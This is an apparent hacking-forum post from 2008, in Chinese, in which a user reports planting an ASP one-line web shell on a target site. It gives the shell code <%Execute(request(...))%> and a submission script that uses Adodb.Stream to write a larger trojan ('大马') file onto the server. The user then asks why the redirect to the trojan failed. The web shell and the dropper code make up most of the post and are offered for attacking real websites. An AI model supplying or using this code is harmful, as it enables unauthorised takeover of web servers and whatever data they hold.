|
- 帖子
- 33
- 积分
- 50
- 威望
- 66
- 金钱
- 65
- 在线时间
- 0 小时
|
我看了hack520大哥的那篇文章,用苯酚log成功了,用的一句话是<%Execute(request("free2ndfree"))%>
我访问http://www.xx.com/1.asp 因为出现了
--------------------------------------------
Microsoft VBScript 运行时错误 错误 '800a000d'
类型不匹配: 'execute'
/1.asp,行 120
------------------------------------------------------------------------
这样的提示,估计是成功了。
接着我用 一句话提交页面 进行提交,里面的内容我做了相应的修改
一句话后门提交
表单提交地址: http://www.xx.com/1.asp
----------------------------------------------------------
set iP=server.createObject("Adodb.Stream")
iP.Open
iP.Type=2
iP.CharSet="gb2312"
iP.writetext request("free2ndfree")
iP.SaveToFile server.mappath("free2ndfree.asp"),2
iP.Close
set iP=nothing
response.redirect "free2ndfree.asp"
-----------------------------------------------------------
添入生成木马的内容
----------------------------------------------------------------------------------------------
我本以为提交后返回的页面是http://www.xx.com/free2ndfree.asp(我的大马)
结果浏览器又返回了http://www.xx.com/1.asp 我很郁闷,!!!
难道是我的 一句话后门提交页面的内容修改错了??? [s:55]
帖子28 精华2 积分104 阅读权限40 性别男 在线时间18 小时 注册时间2006-3-22 最后登录2008-6-8 查看详细资料引用 报告 回复 TOP
free2ndfree 
晶莹剔透§烈日灼然 |
|
发表于 2008-7-21 00:14
| 